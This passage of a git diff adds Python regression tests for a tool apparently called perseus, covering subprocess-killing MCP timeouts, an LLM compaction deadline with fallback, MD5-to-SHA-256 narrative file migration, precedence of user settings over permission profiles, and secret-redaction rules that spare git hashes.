_cfg(redaction_enabled=True) + # Inject a broken pattern that will raise during compile. + cfg["redaction"]["patterns"].append({ + "name": "broken_re", + "pattern": "(unclosed group", # invalid regex + }) + # Should not raise β€” should return something reasonable. + out = perseus._mcp_redact("safe text", cfg) + # Either returns input unchanged (defensive) or the redactor handled + # the bad pattern gracefully β€” both are acceptable. The key assertion + # is no exception. + assert isinstance(out, str) diff --git a/tests/test_mcp.py b/tests/test_mcp.py index 95e0df6..d60e972 100644 --- a/tests/test_mcp.py +++ b/tests/test_mcp.py @@ -145,3 +145,124 @@ def test_stdio_handshake(): finally: proc.stdin.close() proc.wait(timeout=5) + + +# ───────────────────────────────────────────────────────────────────────────── +# #139 regression: _call_tool timeout must kill the subprocess tree and +# must not block on executor shutdown +# ───────────────────────────────────────────────────────────────────────────── + + +def _mcp_query_cfg() -> dict: + """Build a config that allows perseus_query via MCP.""" + c = cfg() + c.setdefault("render", {})["allow_query_shell"] = True + c.setdefault("mcp", {})["tool_timeout_s"] = 1 + c["mcp"]["tool_allowlist"] = ["perseus_query"] + return c + + +def test_call_tool_timeout_does_not_block_on_executor_shutdown(tmp_path): + """Regression for #139 β€” pre-1.0.6 used a context-managed executor, + so future.result(timeout=…) abandoned the future but executor.shutdown + (wait=True) blocked the response until the worker finished. A 1s timeout + on a 10s sleep blocked _call_tool for ~10s. + + Post-fix: shutdown(wait=False, cancel_futures=True) is called in a + finally block. The response returns within ~timeout seconds, not + ~sleep seconds. + """ + c = _mcp_query_cfg() + + start = time.time() + result = perseus._call_tool( + "perseus_query", + {"command": f"sleep 10"}, + c, + tmp_path, + ) + elapsed = time.time() - start + + # Must return promptly. We allow generous headroom (3s) for thread + # scheduling + subprocess cleanup, but the bug being tested manifested + # as ~10s blocking. + assert elapsed < 3.0, ( + f"_call_tool blocked for {elapsed:.2f}s β€” executor.shutdown(wait=True) " + f"defeated the timeout" + ) + assert "timed out" in result.lower() + + +def test_call_tool_timeout_actually_kills_subprocess(tmp_path): + """Regression for #139 β€” pre-1.0.6 abandoned the worker but the + subprocess kept running. After fix, the subprocess tree is killed + via os.killpg (POSIX) or taskkill /T (Windows) on timeout. + """ + import os, subprocess, time as _time, uuid, shutil + if os.name == "nt": + pytest.skip("Subprocess-tree kill test is POSIX-specific") + if shutil.which("pgrep") is None: + pytest.skip("pgrep not available") + + c = _mcp_query_cfg() + + # Use a unique marker so pgrep can find OUR sleep process without + # matching unrelated ones. + marker = f"perseus_test_marker_{uuid.uuid4().hex[:8]}" + cmd = f"sleep 30 # {marker}" + + start = _time.time() + result = perseus._call_tool( + "perseus_query", + {"command": cmd}, + c, + tmp_path, + ) + elapsed = _time.time() - start + + assert elapsed < 3.0 + assert "timed out" in result.lower() + + # Wait briefly for the kill signal to propagate, then assert no + # zombie sleep process remains. + _time.sleep(0.5) + pgrep = subprocess.run( + ["pgrep", "-f", marker], + capture_output=True, text=True, + ) + # pgrep exit code 1 means no matches (good); 0 means matches (bad). + if pgrep.returncode == 0: + # Cleanup before failing + for pid in pgrep.stdout.split(): + try: + os.kill(int(pid), 9) + except (ValueError, ProcessLookupError): + pass + pytest.fail( + f"Subprocess(es) still running after timeout: {pgrep.stdout.strip()}" + ) + + # And the killer hint should be in the result. + assert "subprocess killed" in result.lower() or "timed out" in result.lower() + + +def test_call_tool_normal_completion_under_timeout(tmp_path): + """Sanity: under-timeout calls still work normally.""" + c = _mcp_query_cfg() + c["mcp"]["tool_timeout_s"] = 5 + result = perseus._call_tool( + "perseus_query", + {"command": "echo hello-mcp"}, + c, + tmp_path, + ) + assert "hello-mcp" in result + assert "timed out" not in result.lower() + + +def test_kill_active_subprocess_for_thread_returns_false_when_no_subprocess(): + """The killer is safe to call when no subprocess is registered.""" + import threading + fake_tid = threading.get_ident() + 12345 # ident no thread will use + result = perseus.kill_active_subprocess_for_thread(fake_tid) + assert result is False diff --git a/tests/test_memory.py b/tests/test_memory.py index 0947af1..515da57 100644 --- a/tests/test_memory.py +++ b/tests/test_memory.py @@ -360,3 +360,109 @@ def test_memory_status_json_with_narrative(tmp_path, monkeypatch): "pythia_entries_processed", "pythia_entries_pending", "compaction_count", "line_count", "mode", "frontmatter"): assert key in out, f"Missing key: {key}" + + +# ───────────────────────────────────────────────────────────────────────────── +# #131 regression: memory compact must enforce a wall-clock deadline +# ───────────────────────────────────────────────────────────────────────────── + + +def test_memory_compact_total_timeout_falls_back_to_deterministic( + tmp_path, monkeypatch, capsys +): + """Regression for #131 β€” when the LLM compact path exceeds + `memory.compact_total_timeout_s`, _memory_do_compact must abandon the + LLM call and use the deterministic narrative builder instead. The + operator gets a clear stderr message AND a usable narrative. + """ + local = _mneme_cfg(tmp_path) + local["memory"]["compact_total_timeout_s"] = 0.5 # short for test + + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-16T10:00:00+00:00", "B") + + def slow_llm(*args, **kwargs): + # Simulate a slow LLM (e.g. Ollama with a large model). + time.sleep(2.0) + return "## LLM Content\n\nIf you see this, the timeout did not fire.\n" + + monkeypatch.setattr(perseus, "_mneme_compact_llm", slow_llm) + + start = time.time() + msg = perseus._memory_do_compact(tmp_path, local, provider="ollama") + elapsed = time.time() - start + + # Should return well under 2.0s β€” only block for the timeout deadline, + # not for the full LLM call (we cannot interrupt the thread, but + # future.result(timeout=…) returns immediately on TimeoutError). + assert elapsed < 1.5, ( + f"Compact took {elapsed:.2f}s β€” wall-clock deadline did not fire" + ) + + # Narrative should be the deterministic fallback, not the LLM payload. + p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "If you see this" not in body, ( + "LLM content present β€” fallback did not engage" + ) + assert "## Project Arc" in body, "Deterministic narrative missing" + + err = capsys.readouterr().err + assert "exceeded" in err.lower() or "timeout" in err.lower() + assert "deterministic" in err.lower() + + +def test_memory_compact_succeeds_within_total_timeout(tmp_path, monkeypatch): + """LLM compact succeeds when under the deadline.""" + local = _mneme_cfg(tmp_path) + local["memory"]["compact_total_timeout_s"] = 5.0 + + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + + def fast_llm(*args, **kwargs): + time.sleep(0.05) + return "## Project Arc\n\nLLM-built narrative content.\n" + + monkeypatch.setattr(perseus, "_mneme_compact_llm", fast_llm) + + perseus._memory_do_compact(tmp_path, local, provider="ollama") + + p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "LLM-built narrative content." in body, ( + "LLM body should have been used when call returned within deadline" + ) + + +def test_memory_compact_llm_exception_falls_back_to_deterministic( + tmp_path, monkeypatch, capsys +): + """If the LLM call raises (e.g. provider unreachable), fall back to + deterministic narrative rather than propagating the exception up. + """ + local = _mneme_cfg(tmp_path) + _write_checkpoint(Path(local["checkpoints"]["store"]), + "2026-05-15T10:00:00+00:00", "A") + + def broken_llm(*args, **kwargs): + raise RuntimeError("> ⚠ LLM request failed: Connection refused") + + monkeypatch.setattr(perseus, "_mneme_compact_llm", broken_llm) + + # Must NOT raise β€” fallback engages. + msg = perseus._memory_do_compact(tmp_path, local, provider="ollama") + + p = perseus._mneme_path(tmp_path, local) + _, body = perseus._load_narrative(p) + assert "## Project Arc" in body + err = capsys.readouterr().err + assert "Connection refused" in err or "failed" in err + assert "deterministic" in err + + +def test_memory_compact_default_timeout_is_180s(): + """The DEFAULT_CONFIG must set compact_total_timeout_s to 180s.""" + assert perseus.DEFAULT_CONFIG["memory"]["compact_total_timeout_s"] == 180 diff --git a/tests/test_mneme.py b/tests/test_mneme.py index 39e86dc..a8c0879 100644 --- a/tests/test_mneme.py +++ b/tests/test_mneme.py @@ -187,3 +187,176 @@ def fake_mneme(cfg_, query, k=5, scope=None, type_filter=None, sensitivity=None) perseus.resolve_memory('mode=search query="x"', cfg(), workspace=tmp_path) assert called + + +# --------------------------------------------------------------------------- +# #128 regression: MD5 β†’ SHA-256 narrative migration +# --------------------------------------------------------------------------- + + +def _legacy_md5_name(workspace: Path) -> str: + """Reproduce the pre-1.0.3 hash exactly for fixture setup.""" + import hashlib as _h + canonical = str(workspace.expanduser().resolve()).encode() + try: + return _h.md5(canonical, usedforsecurity=False).hexdigest()[:12] + except TypeError: + return _h.md5(canonical).hexdigest()[:12] + + +def test_mneme_path_auto_migrates_legacy_md5_file(tmp_path): + """Regression for #128 β€” opening a workspace with only a legacy MD5 + narrative on disk renames it transparently to the SHA-256 path. + + Without this fix, every pre-1.0.3 user lost their narrative silently + on the v1.0.3 upgrade (the SHA-256 path didn't exist; MnΔ“mΔ“ reported + "No narrative yet" and started over, leaving the MD5 file orphaned). + """ + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_name = _legacy_md5_name(workspace) + legacy_fp = store / f"{legacy_name}.md" + legacy_fp.write_text( + f"---\nworkspace: {workspace}\nchecksum: legacy-md5\n---\n\n" + "## Project Arc\n\nLegacy content from v1.0.2.\n", + encoding="utf-8", + ) + + # First call should migrate. + new_fp = perseus._mneme_path(workspace, cfg_) + assert new_fp.exists(), "SHA-256 path must exist after migration" + assert not legacy_fp.exists(), "Legacy MD5 file must be renamed away" + body = new_fp.read_text(encoding="utf-8") + assert "Legacy content from v1.0.2." in body, ( + "Migration must preserve narrative content verbatim" + ) + + +def test_mneme_path_no_migration_when_sha256_already_exists(tmp_path): + """If both files exist, prefer SHA-256 and leave the legacy file alone. + + This protects against double-migration races and ensures we never + accidentally overwrite a current-scheme narrative. + """ + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_name = _legacy_md5_name(workspace) + legacy_fp = store / f"{legacy_name}.md" + legacy_fp.write_text("legacy\n", encoding="utf-8") + + sha_name = perseus._workspace_hash(workspace) + sha_fp = store / f"{sha_name}.md" + sha_fp.write_text("current\n", encoding="utf-8") + + result = perseus._mneme_path(workspace, cfg_) + assert result == sha_fp + assert sha_fp.read_text() == "current\n", "Current file must be untouched" + assert legacy_fp.exists(), "Legacy file must NOT be removed in this case" + + +def test_mneme_path_is_idempotent_after_migration(tmp_path): + """Calling _mneme_path twice in a row after a migration is a no-op.""" + store = tmp_path / "store" + store.mkdir() + workspace = tmp_path / "ws" + workspace.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + legacy_fp = store / f"{_legacy_md5_name(workspace)}.md" + legacy_fp.write_text(f"---\nworkspace: {workspace}\n---\n\ndata\n", encoding="utf-8") + + p1 = perseus._mneme_path(workspace, cfg_) + p2 = perseus._mneme_path(workspace, cfg_) + assert p1 == p2 + assert p1.exists() + assert p1.read_text(encoding="utf-8").endswith("data\n") + + +def test_memory_doctor_scan_classifies_files(tmp_path): + """`memory doctor` (scan-only mode) correctly classifies the store.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + ws1 = tmp_path / "ws1"; ws1.mkdir() + ws2 = tmp_path / "ws2"; ws2.mkdir() + + # ws1 has a SHA-256 narrative; ws2 has a legacy MD5 narrative. + (store / f"{perseus._workspace_hash(ws1)}.md").write_text( + f"---\nworkspace: {ws1}\n---\n\nsha file\n", encoding="utf-8" + ) + (store / f"{_legacy_md5_name(ws2)}.md").write_text( + f"---\nworkspace: {ws2}\n---\n\nmd5 file\n", encoding="utf-8" + ) + # A pre-MnΔ“mΔ“ README that should be classified as "unknown stem". + (store / "README.md").write_text("# notes\n", encoding="utf-8") + + scan = perseus._mneme_doctor_scan(cfg_) + assert len(scan["narrative_files"]) == 3 + assert len(scan["sha256_files"]) == 1 + assert len(scan["legacy_md5_files"]) == 1 + assert len(scan["unknown_files"]) == 1 + assert scan["sha256_files"][0].endswith(f"{perseus._workspace_hash(ws1)}.md") + assert scan["legacy_md5_files"][0].endswith(f"{_legacy_md5_name(ws2)}.md") + + +def test_memory_doctor_migrate_renames_legacy_files(tmp_path): + """`memory doctor --migrate` renames every legacy MD5 file in the store.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + wsA = tmp_path / "wsA"; wsA.mkdir() + wsB = tmp_path / "wsB"; wsB.mkdir() + legacyA = store / f"{_legacy_md5_name(wsA)}.md" + legacyB = store / f"{_legacy_md5_name(wsB)}.md" + legacyA.write_text(f"---\nworkspace: {wsA}\n---\n\nA content\n", encoding="utf-8") + legacyB.write_text(f"---\nworkspace: {wsB}\n---\n\nB content\n", encoding="utf-8") + + result = perseus._mneme_doctor_migrate(cfg_) + assert len(result["migrated"]) == 2 + assert not legacyA.exists() + assert not legacyB.exists() + + new_A = store / f"{perseus._workspace_hash(wsA)}.md" + new_B = store / f"{perseus._workspace_hash(wsB)}.md" + assert new_A.exists() and new_A.read_text().endswith("A content\n") + assert new_B.exists() and new_B.read_text().endswith("B content\n") + + # Idempotent: re-running is a no-op. + second = perseus._mneme_doctor_migrate(cfg_) + assert second == {"migrated": [], "skipped": [], "errors": []} + + +def test_memory_doctor_migrate_skips_when_destination_exists(tmp_path): + """If a SHA-256 file is already there, --migrate skips the legacy file.""" + store = tmp_path / "store" + store.mkdir() + cfg_ = {"memory": {"store": str(store)}} + + workspace = tmp_path / "ws" + workspace.mkdir() + legacy_fp = store / f"{_legacy_md5_name(workspace)}.md" + legacy_fp.write_text(f"---\nworkspace: {workspace}\n---\n\nlegacy\n", + encoding="utf-8") + sha_fp = store / f"{perseus._workspace_hash(workspace)}.md" + sha_fp.write_text(f"---\nworkspace: {workspace}\n---\n\ncurrent\n", + encoding="utf-8") + + result = perseus._mneme_doctor_migrate(cfg_) + assert result["migrated"] == [] + assert len(result["skipped"]) == 1 + old, new, reason = result["skipped"][0] + assert "exists" in reason + # Both files still present. + assert legacy_fp.exists() + assert sha_fp.exists() + assert sha_fp.read_text().endswith("current\n") diff --git a/tests/test_permission_profiles.py b/tests/test_permission_profiles.py index 1481e63..c524beb 100644 --- a/tests/test_permission_profiles.py +++ b/tests/test_permission_profiles.py @@ -259,3 +259,216 @@ def test_trust_summary_partial_config_fails_closed(): assert payload["effective"]["render"]["allow_query_shell"] is False assert payload["effective"]["render"]["allow_agent_shell"] is False + + +# ── #129 hardening regression matrix ───────────────────────────────────────── +# Pre-1.0.6 there was a documented bug where a workspace config that set both +# `permissions.profile: balanced` and `render.allow_query_shell: true` would +# silently render with `allow_query_shell=false` because the profile merge +# overwrote the user's explicit value. The fix landed via load_config call- +# ordering; v1.0.6 makes the precedence **structural** via `skip_keys`. +# +# This matrix asserts the explicit-user-wins guarantee across: +# - all 3 named profiles (strict, balanced, power-user) +# - all 5 boolean security gates in render.* +# - both directions of override (user=True over profile=False +# and user=False over profile=True) +# +# It also asserts that the audit log records the layering decision. + +PROFILE_KEYS = [ + "allow_query_shell", + "allow_agent_shell", + "allow_services_command", + "allow_remote_services_health", + "allow_outside_workspace", +] + + +@pytest.mark.parametrize("profile_name", ["strict", "balanced", "power-user"]) +@pytest.mark.parametrize("override_key", PROFILE_KEYS) +@pytest.mark.parametrize("override_value", [True, False]) +def test_explicit_user_render_key_wins_over_profile( + monkeypatch, tmp_path, profile_name, override_key, override_value +): + """User-set render.* keys always win over the profile's default for + that key, regardless of profile or direction of override. + + This is the structural #129 guarantee.""" + home = tmp_path / "home" + home.mkdir() + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": profile_name}, + "render": {override_key: override_value}, + })) + + cfg = perseus.load_config(workspace=workspace) + assert cfg["render"][override_key] is override_value, ( + f"profile={profile_name} key={override_key}: expected user value " + f"{override_value} but got {cfg['render'][override_key]}" + ) + + # Other render keys should still reflect the profile's value. + expected_profile = perseus.PERMISSION_PROFILES[profile_name]["render"] + for key in PROFILE_KEYS: + if key == override_key: + continue + assert cfg["render"][key] == expected_profile[key], ( + f"profile={profile_name}: non-overridden key {key} expected " + f"{expected_profile[key]} but got {cfg['render'][key]}" + ) + + +def test_explicit_user_value_wins_when_set_to_same_value_as_profile( + monkeypatch, tmp_path +): + """If user explicitly sets a value identical to the profile default, + the result is still the user's value (semantically equivalent but the + audit log should record the override).""" + home = tmp_path / "home" + home.mkdir() + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": "balanced"}, + # Same value as balanced's default for this key + "render": {"allow_query_shell": False}, + })) + + cfg = perseus.load_config(workspace=workspace) + assert cfg["render"]["allow_query_shell"] is False + + +def test_workspace_overrides_global_for_profile_and_render( + monkeypatch, tmp_path +): + """Workspace `permissions.profile` AND workspace `render.*` both win + over global config. This is the most realistic Thomas-scenario: + global says strict, workspace says power-user with an override.""" + home = tmp_path / "home" + home.mkdir() + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home) + + # Global: strict, everything off + (home / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": "strict"}, + })) + # Workspace: balanced profile + power-user-ish override + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": "balanced"}, + "render": {"allow_query_shell": True}, + })) + + cfg = perseus.load_config(workspace=workspace) + assert cfg["render"]["allow_query_shell"] is True + # Other keys should reflect balanced (workspace profile wins over global) + assert cfg["render"]["allow_agent_shell"] is False + assert cfg["render"]["allow_outside_workspace"] is False + + +def test_apply_permission_profile_skip_keys_directly(monkeypatch): + """Unit test for the new `skip_keys` parameter.""" + cfg = { + "render": { + "allow_query_shell": True, + "allow_agent_shell": False, + }, + } + skip = {("render", "allow_query_shell")} + applied = perseus._apply_permission_profile(cfg, "strict", skip_keys=skip) + assert applied == "strict" + # Skipped key preserved + assert cfg["render"]["allow_query_shell"] is True + # Non-skipped key overwritten by profile + assert cfg["render"]["allow_agent_shell"] is False # strict default + # Profile sets keys not in cfg + assert cfg["render"]["allow_services_command"] is False + + +def test_apply_permission_profile_legacy_no_skip_keys_still_works(monkeypatch): + """Backward compatibility: callers passing no skip_keys get destructive + merge (pre-v1.0.6 behavior).""" + cfg = { + "render": { + "allow_query_shell": True, + }, + } + applied = perseus._apply_permission_profile(cfg, "strict") + assert applied == "strict" + # No skip_keys β†’ profile wins + assert cfg["render"]["allow_query_shell"] is False + + +def test_audit_log_records_profile_override_decision(monkeypatch, tmp_path): + """When user explicitly overrides a profile-managed key, audit log + gets a `config_profile_overridden` event.""" + # _audit_log_path constrains the log to ~/.perseus/ for safety (S5). + # Point HOME (not just PERSEUS_HOME) at tmp_path so the default audit + # path lands inside an allowed root. + home = tmp_path / "home" + (home / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home / ".perseus") + monkeypatch.setenv("HOME", str(home)) + + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": "balanced"}, + "render": {"allow_query_shell": True}, + "audit": {"enabled": True}, + })) + + cfg = perseus.load_config(workspace=workspace) + assert cfg["render"]["allow_query_shell"] is True + + # Audit log should have a config_profile_overridden entry + audit_path = home / ".perseus" / "audit_log.jsonl" + assert audit_path.exists(), "Audit log was not created" + lines = [json.loads(line) for line in audit_path.read_text().splitlines() if line.strip()] + override_events = [e for e in lines if e.get("event_type") == "config_profile_overridden"] + assert len(override_events) >= 1, ( + f"No config_profile_overridden event in audit log. Events: " + f"{[e.get('event_type') for e in lines]}" + ) + evt = override_events[-1] + assert evt["profile"] == "balanced" + assert "render.allow_query_shell" in evt["user_overrides"] + + +def test_no_audit_event_when_user_does_not_override_profile_keys( + monkeypatch, tmp_path +): + """If user sets only keys NOT managed by the profile, no override + event is logged (it would be noise).""" + home = tmp_path / "home" + (home / ".perseus").mkdir(parents=True) + monkeypatch.setattr(perseus, "PERSEUS_HOME", home / ".perseus") + monkeypatch.setenv("HOME", str(home)) + + workspace = tmp_path / "ws" + (workspace / ".perseus").mkdir(parents=True) + + (workspace / ".perseus" / "config.yaml").write_text(yaml.safe_dump({ + "permissions": {"profile": "balanced"}, + # `cache_dir` is not a profile-managed key + "render": {"cache_dir": str(home / "cache")}, + "audit": {"enabled": True}, + })) + + cfg = perseus.load_config(workspace=workspace) + audit_path = home / ".perseus" / "audit_log.jsonl" + if audit_path.exists(): + lines = [json.loads(line) for line in audit_path.read_text().splitlines() if line.strip()] + override_events = [e for e in lines if e.get("event_type") == "config_profile_overridden"] + assert len(override_events) == 0, ( + "Should not log an override event for non-profile-managed keys" + ) diff --git a/tests/test_redaction.py b/tests/test_redaction.py index 80bfa51..ba305b5 100644 --- a/tests/test_redaction.py +++ b/tests/test_redaction.py @@ -315,3 +315,70 @@ def test_strict_profile_does_not_disable_redaction(monkeypatch, tmp_path): })) cfg = perseus.load_config() assert cfg["redaction"]["enabled"] is True + + +# ── regression: #136 long_hex_secret must NOT eat git hashes ───────────────── + + +def test_bare_git_sha1_is_not_redacted_by_defaults(): + """Regression for #136 β€” bare 40-char git SHAs must survive default rules.""" + git_log_line = "86ca950b3f1a2c4d5e6f7a8b9c0d1e2f3a4b5c6d fix(resolve_read)" + out, report = perseus.redact_text(git_log_line, {}) + assert "86ca950b3f1a2c4d5e6f7a8b9c0d1e2f3a4b5c6d" in out + assert report["counts"].get("long_hex_secret", 0) == 0 + + +def test_bare_sha256_checksum_is_not_redacted_by_defaults(): + """Regression for #136 β€” 64-char SHA-256 sums must survive.""" + sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" + text = f"checksum: {sha256} perseus.py" + out, report = perseus.redact_text(text, {}) + assert sha256 in out + assert report["counts"].get("long_hex_secret", 0) == 0 + + +def test_credential_anchored_hex_IS_redacted(): + """Regression for #136 β€” the new rule MUST still catch real secrets.""" + cases = [ + 'api_key = "abcdef0123456789abcdef0123456789abcdef01"', + "secret=abcdef0123456789abcdef0123456789abcdef01", + 'token: "abcdef0123456789abcdef0123456789abcdef01"', + "password = abcdef0123456789abcdef0123456789abcdef01", + "Authorization=abcdef0123456789abcdef0123456789abcdef01", + ] + for text in cases: + out, report = perseus.redact_text(text, {}) + assert "abcdef01" not in out, ( + f"Hex secret in credential context not redacted: {text!r} β†’ {out!r}" + ) + assert report["counts"].get("long_hex_secret", 0) >= 1 + + +def test_credential_anchored_hex_preserves_surrounding_context(): + """The anchor context (key name, =, quotes) must survive verbatim.""" + text = 'api_key = "abcdef0123456789abcdef0123456789abcdef01"' + out, _ = perseus.redact_text(text, {}) + assert out.startswith('api_key = "[REDACTED:long_hex_secret]') + assert out.endswith('"') + + +def test_bearer_header_prefix_still_preserved(): + """Sanity: bearer_header prefix-preserve behavior must still work.""" + text = "Authorization: Bearer abcdef0123456789abcdef0123456789" + out, _ = perseus.redact_text(text, {}) + assert out.lower().startswith("authorization: bearer ") + assert "abcdef0123456789abcdef0123456789" not in out + + +def test_at_query_git_log_output_survives_redaction(): + """Integration regression: simulated @query 'git log' output preserved.""" + git_log = "\n".join([ + "86ca950 fix(resolve_read): add missing max_bytes assignment", + "ff5be4f fix(resolve_include): add missing max_bytes assignment", + "abcdef0123456789abcdef0123456789abcdef01 some commit", + ]) + out, report = perseus.redact_text(git_log, {}) + for hash_str in ("86ca950", "ff5be4f", + "abcdef0123456789abcdef0123456789abcdef01"): + assert hash_str in out + assert report["counts"].get("long_hex_secret", 0) == 0